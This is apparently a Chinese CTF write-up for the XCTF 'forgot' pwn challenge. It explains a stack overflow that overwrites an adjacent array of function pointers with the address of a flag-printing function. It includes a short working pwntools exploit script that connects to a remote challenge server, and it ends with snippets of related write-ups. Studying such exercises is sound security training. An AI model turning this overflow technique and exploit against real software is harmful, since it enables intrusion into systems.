攻防世界(Pwn) forgot---栈溢出；(方法二)

攻防世界(Pwn) forgot—栈溢出；(方法一) 里面对问题描述的更详细一点

返回目标函数

0x80486CC

方法二(爆破流)

因为最终返回的是 v3[0]-v3[9] 之中的一个函数,

v3[--v5] v5的值随着for循环会发生改变

v2输入是溢出点

v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了

干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC

此时无论v5等于什么,我们都会得到目标 flag

EXP

from pwn import  *
io = remote('111.200.241.244', 59837)
payload = 'H'*0x20 + p32(0x80486cc)*10
io.sendlineafter(">","hhh")
io.sendlineafter(">",payload)
io.interactive()

有问题欢迎留言❄

攻防世界(Pwn) forgot---栈溢出；(方法二)相关推荐

[攻防世界 pwn]——forgot
[攻防世界 pwn]--forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护在IDA中, 竟然有后面函数, 找到sub_80486C ...
攻防世界 pwn forgot
下面记录一下我在做攻防世界的pwn练习题中的forgot题目的过程,这个题目现在还是有些疑惑的首先我们看一下题目的安全机制: 然后IDA看一下主函数: int __cdecl main() {siz ...
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
说明这其实是一种类型题,新手刚开始会碰到,题目大致过程是有个srand()的随机函数.需要覆盖 seed种子即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机 ...
攻防世界pwn——forgot
分析 checksec IDA 直接搜flag找到sub_80486CC,有system,这肯定是我们要调用的函数了,函数地址0x080486CC int sub_80486CC() {char s[ ...
攻防世界(Pwn) forgot---栈溢出；(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
攻防世界 Pwn 进阶第一页
00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...
[攻防世界 pwn]——pwn1（内涵peak小知识）
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
[攻防世界 pwn]——Mary_Morton
[攻防世界 pwn]--Mary_Morton 题目地址: https://adworld.xctf.org.cn/ 题目: checksec看下,64位还开启了NX和canary保护.(一般开启ca ...
攻防世界 Pwn 进阶第二页
00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手攻防 ...

攻防世界(Pwn) forgot---栈溢出；(方法二)

返回目标函数

方法二(爆破流)

EXP

有问题欢迎留言❄

攻防世界(Pwn) forgot---栈溢出；(方法二)相关推荐

最新文章

热门文章